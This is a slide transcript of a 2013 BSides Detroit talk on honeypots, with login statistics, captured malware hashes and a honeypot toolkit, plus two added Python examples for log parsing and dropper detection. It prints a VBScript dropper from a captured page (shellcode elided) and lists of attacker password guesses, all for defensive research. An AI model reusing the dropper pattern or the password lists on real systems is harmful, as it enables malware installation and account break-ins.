bsides detroit 2013 honeypots
TRANSCRIPT
Be vewy, vewy quiet….
let’s watch some hackers..
Interactive portion intro
Whoami
What is a Honeypot?
Different Honeypots
Why Honeypots?
Things I discovered
Stratagem
Interactive portion end results
Interactive portion
SSID – FBI Mobile
IP address – 192.168.2.5
User ID – bsides
The password is… detroit (told you it was easy)
Father
Husband
Geek
Antagonist of the shiny things
ShadowServer.org volunteer
Security analyst
Whoami
A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)
Why Honeypots?
Low interaction server honeypots
HoneyD
Low interaction server honeypots
Conpot
Different Honeypots
Client-side honeypots
Windows XP SP0, Windows Vista SP0
Client honeypots – high interaction
Different Honeypots
Initial Research
A word of advice on using an EC2 instance.
GeoIP location: Dionaea – Ireland
Dionaea stats
Started 3/7/2013, stopped 3/9/2013
Started 3/12/2013, stopped 3/14/2013
Graphs are courtesy of DionaeaFRtool
Dionaea stats
• Don’t forget to add your API key from VirusTotal to your config file!!
• If you don’t add the API key, the pretty visualization tool can’t do its job and you have to do it manually!!!
[Chart: top 10 attacking IP addresses by connection count]
Dionaea stats – Top 10 IP addresses
Wireshark analysis – attack attempts
Malware captures
MD5 / VirusTotal detection ratio / Common name / Source IP address and WhoIs

78c9042bbcefd65beaa0d40386da9f89
44 / 46 – Microsoft: Worm:Win32/Conficker.C
209.190.25.37 – XLHost, VPS provider – http://www.xlhost.com/

7acba0d01e49618e25744d9a08e6900c
45 / 46 – Microsoft: Worm:Win32/Conficker.B
69.28.137.10 – LimeLight Networks, a Digital Presence Management company – http://www.limelight.com/

90c081de8a30794339d96d64b86ae194
42 / 43 – Kaspersky: Backdoor.Win32.Rbot.aftu
69.38.10.83 – WindStream Communications, voice and data provider – http://NuVox.net

bcaef2729405ae54d62cb5ed097efa12
43 / 44 – Kaspersky: Backdoor.Win32.Rbot.bqj
69.9.236.128 – Midwest Communications, Comcast/WideOpenWest parallel – http://midco.net/
GeoIP location: Dionaea – recent
Dionaea – Detection
Kippo
Started 2/27/2013, stopped 3/1/2013
IP addresses
• 14 unique IP addresses
• Maximum password attempts – 1342
• Successful logins – 7
• Replay scripts – 1
• Files uploaded – 1
Kippo stats
[Chart: attackers' IP addresses / connection attempts, 2/27 to 3/1]
GeoIP location: Kippo – recent
Kippo stats
[Chart: top 25 user names by times tried, 2/27 – 3/1: root, bin, oracle, test, nagios, martin, toor, ftpuser, user, postgres, info, webmaster, apache, backup, guest, r00t, public, green, demo, site, jeff, andy, i-heart, user0, content]
[Chart: top 25 passwords by tries, 2/27 to 3/1; the most-tried password was used 27 times]
Kippo stats
Accounts that used 123456 as password
User ID    Tries
root       7
ftpuser    3
oracle     3
andy       2
info       2
jeff       2
site       2
webmaster  2
areyes     1
brian      1
“7 successful logons? But your chart says 27 used the password of 123456?! WTF?”
Kippo stats
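The tables above are what you get by counting every credential pair Kippo logs, not just the ones that matched the fake account. As an added example (not the talk's own tooling), this Python script parses constructed lines modelled on Kippo's text log and produces the same three views: top user names, top passwords, and the per-user breakdown of one password, which is how 27 tries of 123456 can coexist with only 7 successful logons. The log line format is an assumption.

```python
import re
from collections import Counter

# Constructed sample lines modelled on Kippo's text log (the format is an
# assumption, not copied from the talk); one line per credential tried.
SAMPLE_LOG = """\
2013-02-27 10:49:07+0000 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.7] login attempt [root/123456] succeeded
2013-02-27 10:49:09+0000 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.7] login attempt [ftpuser/123456] failed
2013-02-27 10:49:10+0000 [SSHService ssh-userauth on HoneyPotTransport,2,203.0.113.7] login attempt [oracle/123456] failed
2013-02-27 11:02:31+0000 [SSHService ssh-userauth on HoneyPotTransport,3,198.51.100.9] login attempt [root/toor] failed
2013-02-27 11:02:33+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.9] login attempt [root/123456] succeeded
2013-02-27 11:02:35+0000 [SSHService ssh-userauth on HoneyPotTransport,5,198.51.100.9] login attempt [andy/123456] failed
2013-02-28 03:15:00+0000 [SSHService ssh-userauth on HoneyPotTransport,6,192.0.2.44] login attempt [webmaster/password] failed
"""

LOGIN_RE = re.compile(
    r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] login attempt "
    r"\[(?P<user>[^/\]]+)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)"
)

def parse_attempts(text):
    """Yield (ip, user, password, succeeded) for every login-attempt line."""
    for line in text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            yield m["ip"], m["user"], m["pw"], m["result"] == "succeeded"

def summarize(text, top=25):
    """The headline numbers and the two top-N charts from the slides."""
    attempts = list(parse_attempts(text))
    return {
        "attempts": len(attempts),
        "unique_ips": len({a[0] for a in attempts}),
        "successes": sum(1 for a in attempts if a[3]),
        "top_users": Counter(a[1] for a in attempts).most_common(top),
        "top_passwords": Counter(a[2] for a in attempts).most_common(top),
    }

def users_for_password(text, password):
    """Tries per user ID for one password. Every attempt is counted, but only
    the user/password pair the honeypot is configured to accept succeeds, so
    this total is always >= the number of successful logons."""
    tries = Counter(a[1] for a in parse_attempts(text) if a[2] == password)
    return tries.most_common()
```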
Interesting passwords (user ID / password)
root öÎÄ¥þ.òÄ¿Â¥
root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs
root $hack4m3baby#b1gbroth3r$
root 654321
root Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD
root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!&
root diffie-hellman-group-exchange-sha11
root 123
root 1234
root 12345
root 1234567
root 12345678
root 123456789
root deathfromromaniansecurityteamneversleepba
root rooooooooooooooooooooooooooooooooot
A shifted-QWERTY walk, extended by one character per attempt:
root !Q@W#E$
root !Q@W#E$R
root !Q@W#E$R%
root !Q@W#E$R%T
root !Q@W#E$R%T^
root !Q@W#E$R%T^Y
root !Q@W#E$R%T^Y&
root !Q@W#E$R%T^Y&U
root !Q@W#E$R%T^Y&U*
root !Q@W#E$R%T^Y&U*I
root !Q@W#E$R%T^Y&U*I(
root !Q@W#E$R%T^Y&U*I(O
root !Q@W#E$R%T^Y&U*I(O)
root !Q@W#E$R%T^Y&U*I(O)P
root !Q@W#E$R%T^Y&U*I(O)P_
Kippo stats – File downloaded
psyBNC 2.3.2
------------
This program is useful for people who cannot be on irc all the time. It's used to keep a connection to irc and your irc client connected, or also allows to act as a normal bouncer by disconnecting from the irc server when the client disconnects.
Kippo
Started 5/31/2013, stopped 6/1/2013
IP addresses
• Unique IP addresses – 20
• Maximum password attempts – 1098
• Successful logins – 16
• Replay scripts – 4
• Files uploaded – 1
Kippo stats
[Chart: attackers' IP addresses / connection attempts, 5/31 to 6/1]
[Chart: top 25 passwords by attempts, 5/31 to 6/1]
[Chart: top 25 user names by login attempts, 5/31 to 6/1]
Kippo stats – Replay script 20130603-104907-9177.log
Just trying to run Perl
Kippo stats – Replay script 20130530-134418-3935.log
Upload of shellbot.pl
Kippo stats – File downloaded
#!/usr/bin/perl
#
# ShellBOT by: devil__
Discovered: June 3, 2005
Updated: April 30, 2010 3:46:09 AM
Type: Trojan
Systems Affected: Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
Backdoor.Shellbot is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer.
As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer.
Backdoor.Shellbot – Risk Level 1: Very Low
Kippo stats – Replay script 20130602-105723-5678.log
Uploads a tar.gz and trips a Python reply script
Kippo – Detection
CTF replay scripts
Kippo
• Config file changes
• Custom reply files
Lessons learned
HoneyD
Amun
Started 5/29, stopped 5/30
IP addresses
• Unique IP addresses – 3
• Files uploaded – 2
Amun
Azenv.php (uploaded twice)
• ProxyJudge script
Files uploaded
Thug
• Honeyclient
• Mimics client behavior
• Browser
• Plug-ins for 3rd party apps
Mwcrawler
PE32 files
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 445
Infected files: 44
Data scanned: 510.42 MB
Data read: 353.98 MB (ratio 1.44:1)
Time: 147.925 sec (2 m 27 s)

Data
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 4
Infected files: 1
Data scanned: 1.04 MB
Data read: 0.41 MB (ratio 2.57:1)
Time: 7.612 sec (0 m 7 s)
Mwcrawler
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled Document</title></head>
<body>
<p align="center"><h1>We're sorry,</h1><h2>The site is temporarly unavailable. Please check in next few days</h2></p>
</body></html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = <Lots of shellcode>
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
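The dropper above has a recognisable shape: a hex string, a Chr(CLng("&H" ...)) loop writing it to the temp folder, and WScript.Shell running the result. As an added example (not the talk's own code and not part of Mwcrawler), this Python scanner flags a page only when all three pieces are present, then decodes the hex to report the dropped file name and the payload's MD5 for a VirusTotal lookup. The sample page is constructed and its hex blob is only an MZ header stub, not the original shellcode.

```python
import hashlib
import re

# Constructed page modelled on the dropper from the talk; the hex blob is a
# 16-byte MZ header stub, not real shellcode.
SAMPLE_HTML = """<html><body><h1>We're sorry,</h1>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT></body></html>"""

# Each indicator is one link of the drop-and-run chain. All three together are
# a strong signal; any one alone also appears in benign admin scripts.
INDICATORS = {
    "hex_to_bytes_loop": re.compile(r'Chr\(CLng\("&H"\s*&\s*Mid\(', re.I),
    "filesystem_object": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "shell_run": re.compile(r'CreateObject\("WScript\.Shell"\).*?\.Run\b', re.I | re.S),
}
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]+)"')
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"')

def scan_vbscript_dropper(html):
    """Return None if the page lacks the full dropper chain, else a dict with
    the dropped file name and the MD5 of the decoded payload (for VirusTotal)."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    if not all(hits.values()):
        return None
    blob = WRITEDATA_RE.search(html)
    payload = bytes.fromhex(blob.group(1)) if blob else b""
    name = DROPNAME_RE.search(html)
    return {
        "drop_file": name.group(1) if name else None,
        "payload_len": len(payload),
        "payload_md5": hashlib.md5(payload).hexdigest(),
        "is_pe": payload[:2] == b"MZ",  # decoded bytes start with an MZ header
    }
```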
How you can make your netbook useful and fun again!
Project page
Goals
◦ Documentation
Tools
◦ Honeypots
◦ Network
◦ Malware
◦ Forensics
◦ Tools
Stratagem – http://sourceforge.net/projects/stratagem/
Honeypots
◦ Dionaea
◦ Kippo
◦ Glastopf
◦ HoneyD
◦ Amun
◦ Labrea
◦ Tinyhoneypot
◦ Thug
◦ Conpot
Stratagem
Network
◦ Scapy
◦ proxychains
◦ Ngrep
◦ Network Miner
◦ Amun
◦ Xplico
◦ Capanalysis
◦ Network
Malware
◦ Mwcrawler
◦ Yara
◦ ClamAV
Stratagem
Forensics
◦ Volatility
Tools
◦ Tor
◦ i2p
◦ Conky
◦ Guake
◦ Terminator
Stratagem
Capanalysis
Next?
Resources
• A host at $IP ($location) tried to log into my honeypot's fake Terminal Services server
• GET-based RFI attack from $IP ($location)
• A host at $IP ($location) tried to log into my honeypot's fake MSSQL Server
http://inguardians.com/
Resources
http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport
Honeydrive
Keith Dixon
@Tazdrumm3r
#misec – [email protected]
http://tazdrumm3r.wordpress.com